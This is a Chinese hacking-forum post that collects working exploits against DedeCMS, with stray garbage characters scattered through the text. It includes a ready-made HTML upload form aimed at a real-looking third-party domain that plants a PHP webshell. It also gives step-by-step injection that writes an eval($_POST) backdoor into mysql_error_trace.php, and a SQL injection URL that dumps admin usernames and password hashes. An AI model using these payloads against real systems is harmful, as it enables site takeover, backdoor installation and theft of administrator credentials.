! U1 ]+ N! P4 X* ^* m
) b: S) h% f* r7 y: ]0 t( _( S: M( O- U' P0 v; r

. d6 s8 n- j" |6 p* ~0 |织梦(Dedecms)select_soft_post.php页面变量未初始漏洞1 O" |/ [2 R: M4 g3 I5 e0 k
<html>9 i& ?3 V8 d6 N+ ~( w& y! p( a
<head>
9 q' n) f5 o7 @. j: s& A<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
8 T  Z. X% M2 e& O+ L2 A% H2 k+ Y</head>/ F8 @6 }5 h4 M: v; F9 `
<body style="FONT-SIZE: 9pt">
9 |/ [- L; r: n. d0 S---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
) J4 v% A# N1 t! p) ^<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  Y1 A% ]0 f: X1 d# |<input type='hidden' name='activepath' value='/data/cache/' />
1 D" x0 k9 J! Y7 J<input type='hidden' name='cfg_basedir' value='../../' />1 s, D4 _) H( l/ r1 O9 R' D, M
<input type='hidden' name='cfg_imgtype' value='php' />
, L$ S& Z9 Y/ G: u7 p7 X+ D% [1 w1 Y  l<input type='hidden' name='cfg_not_allowall' value='txt' />( f4 f8 M  C0 o* u
<input type='hidden' name='cfg_softtype' value='php' />
2 |3 ?1 A/ {2 D& g4 B6 C<input type='hidden' name='cfg_mediatype' value='php' />
8 v9 y$ g5 N5 ~1 F<input type='hidden' name='f' value='form1.enclosure' />
! J# K! v: m. E* N% b<input type='hidden' name='job' value='upload' />
3 @0 @7 Y$ r& W& M* v1 B" y5 O% J<input type='hidden' name='newname' value='fly.php' />
9 F$ Z; `% J  J+ u. bSelect U Shell <input type='file' name='uploadfile' size='25' />
! w! o+ ^6 I4 V<input type='submit' name='sb1' value='确定' />2 N6 f1 T+ D. q
</form>
# K+ n+ K! b+ _  e9 {<br />It's just a exp for the bug of Dedecms V55...<br />
/ Z+ j* j2 [0 ~: SNeed register_globals = on...<br />; Q! [  r% ]3 O( s% U/ H% r
Fun the game,get a webshell at /data/cache/fly.php...<br />* q+ B: w3 n' O+ o, b8 U
</body>9 p7 [& L( L4 n" q* E/ p* G
</html>
5 R& {- x+ V4 P! z# m# g
1 `. p3 V7 w& @/ A9 T
2 ]) R' _2 x* Q; }6 j- M5 K  f4 @/ X* A3 U$ I

* N7 q: B* C+ H% A0 s( f$ K+ G* I' t2 p7 Q2 L' \
3 a: n* v2 h4 _: F: T7 I) t
& D0 G' K8 T/ r, @

* s+ l- E7 `! ]) Z
- h$ n+ c6 X. m* v+ n! H
: P. d  @- B$ v$ Z5 [4 a% X- y织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
; b) A* O) N* o% r4 v; R9 j7 ?利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。- l7 k9 [. L7 C% ?, O5 N/ Y  w
1. 访问网址:- Y& B  v* L" E9 i% ~7 ~
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
0 o% O# a) g. D4 Y6 e! c9 q* L可看见错误信息5 ?6 Y4 u5 ?, t% d/ C) T

8 [: r7 L9 a3 v1 d3 i8 h
) Z. B/ B& j1 a! N, I$ W2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。1 }# ]0 N- l0 s5 O) N
int(3) Error: Illegal double '1024e1024' value found during parsing) w; a. U1 A& g% I9 r7 ?
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>; X3 h5 @( M# `7 b& n/ z6 L
2 u7 g# X! v; l, j* D( O
7 k/ O8 }1 P' I7 o) F: f& r# `
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
$ K( Y! D4 J9 y- {! U
, `4 \# [: d1 z% y( J9 v( r! B
- y  G' M" c% q7 w% U. O& `<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>$ W  }8 s0 r1 v5 Y7 c- ]

* I' p. o1 V& i$ R4 R3 \
* ?( b& ]" _: I$ |: _; a按确定后的看到第2步骤的信息表示文件木马上传成功.
0 f4 a, y- v0 K+ Z3 X% j$ ~5 k# b
3 N& m- Z5 X" w$ Q; G, m3 m3 ^6 I' q( [

) F: u3 P8 f& `4 Q# ~8 q
) w! ]/ h8 w* c& P8 V' A9 m( i( a2 |1 t  d( x
/ A. B( q* V  S4 y, q; D: Z

" N4 h1 d2 \8 q% [9 |- |; ?# Z
% }4 R& J5 G( W% ^* ?6 G5 l
/ J: t# ^( a# A- q7 }4 f

+ ?* m2 ^. H0 J* H+ z* N/ r; r' D" ?7 U" U; ^
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
' S6 m+ \! Z" j4 ehttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2